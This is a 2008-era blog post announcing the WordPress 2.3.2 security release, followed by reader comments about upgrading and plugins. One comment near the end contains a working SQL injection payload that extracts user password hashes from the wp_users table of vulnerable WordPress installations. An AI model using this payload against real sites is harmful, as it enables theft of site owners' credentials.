WordPress 2.3.2 Available for Download
written by John Chow
WordPress has just released an urgent security update for the 2.3 series. If you’re blog is powered by WordPress 2.3, then you should upgrade to this latest version right away. The upgrade fixes a security bug that allows people to view your timestamped posts. You may have seen a few posts around Blogsphere showing how to see what Shoemoney is going to post tomorrow. Well, once Shoe upgrades his WordPress, you won’t be able to do that anymore.
WordPress 2.3.2 also suppresses some error messages that can give away information about your database table structure and limits and stops some information leaks in the XML-RPC and APP implementations. There’s also a bonus that allows you to define a custom DB error page. See the full list of changes here.
This is not a major release and as such it will not change your DB structure. Upgrading should be as easy as uploading and replacing the old WordPress files. That’s what I did anyway. You can see a list of full bug fixes here.
Find out what I am doing right now by following me on Twitter! If you like this post then please consider subscribing to my full feed RSS. You can also subscribe by Email and have new posts sent directly to your inbox.
(10 votes, average: 3.8 out of 5)
Loading ...
Here's A Few More Related Posts
WordPress Never Stop !!
Well at least they do improve and serve us with more secure platform rather than just ignore the bugs.
I know that if you know the URL of a post you can view it before it goes live but I didn’t know there was another way.
I better go update now.
does anybody else know, how? it could be cool as a little test
I noticed the time stamp issue and thought that it shouldn’t work that way, but then just dismissed it. I guess that for the A-list bloggers, it could be detrimental for others to see your post before it’s officially published.
Thanks! I probably wouldn’t have updated until much later if it wasn’t for this post
Thanks, i’ll be upgrading my blog shortly.
Good catch and good explanation, John. Funny, I took more than an hour off to drink coffee and work down the list of un-reads in my feedreader this morning and I didn’t come across anyone else mentioning this until I got to you (saving the best ’til last ;-)).
I highly recommend techie-buzz’s automatic update plug-in. makes these upgrades a snap and also let’s you do backup as part of the process very painlessly. It’s available at:
http://techie-buzz.com/wordpress-plugins/wordpress-automatic-upgrade-plugin.html
for those who hate manual piece by piece updating.
Thanks for the info John… and thanks for the link to the Wordpress plugin Dave, it’s gonna make updating all my blogs that much faster!
Good work Mr Chow. I just read it here first! The automatic updater you turned me on to wrks a treat as well. Cheers!
Yes I saw on my blog Dashboard about New Version Update i didnt update yet , I wanna do this soon
Darn! If only I knew about this earlier, so I could have sneaked into posts
-Mike
Dam, I’ve like 6 blogs that will need updating. Thanks for the heads up.
use the plugin..it will be easier and fun
no one can read my timestamped posts
goooooo wordpress!
Thanks a lot for the heads up!
For people who want to have a full secure on his work or personal detail, upgrading would be a good idea. Thanks for showing us John.
Thanks for the heads up
Newbie question. I’ve never done this before. Will I lose all of the tweaks, such as custom header, installed widgets, and other stuff that I’ve done?
If so, is there an easy way to get everything back? I just don’t want to end up back at the basic Kubrick design. Thanks a lot.
No you will not lose those.Made a backup anyway before upgrading.
Will do. Thank you.
I’m still updating. Heck, I never knew you could see what Shoe was posting, before he posted it.
Thx for the tip.
Wordpress just continues to updates and give the best to it’s users.
Wordpress theme viewer back! Finally!
Yay! The Wordpress theme viewer site is finally back probably following the Wordpress upgrade to 2.2.3.
This has been something I’ve been tense about for a while as I was looking for a new theme, but couldn’t find one. Once again, I’m…
Thanks for the heads up on this John.
Wordpress 2.3.2 Upgrade
Wordpress has released an urgent security release that can expose draft posts. If you’re using 2.3.1, you should immediately do an upgrade. The process took me about 5 minutes, which most it was making a backup of the server, deleting the nec…
Thank you for the info about the update. Security is the first.
[...] Chow at John Chow dot com reminds bloggers that Wordpress 2.3.2 is available for download. I have to get on this right away. Remember: if John Chow tells you to do something on your blog . . [...]
After the upgrade several of my plug-ins stopped working. Specifically, Brian’s Threaded Comments, and WP-Cache. Anyone else running into this? My comments look terrible now.
I know what I did find, my theme no longer displays correctly, I had to go back to 2.3.1 to get it to work properly again.
Here technical reason documentation.
=== WordPress Charset SQL Injection Vulnerability ===
exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
I don’t know if I’m going to upgrade right away or not. Decisions, decisions.
Thanks for reporting it, John. My blog jumped from 50 to 200 subscribers today.
For many, they rather people read their timestamp posts since it gives them one more visitors
[...] actually heard about the update over at John’s site before I logged into my Admin, so I managed to read through the comments, when I came across a much [...]
“If you’re blog is powered by WordPress”
No, I am not a blog.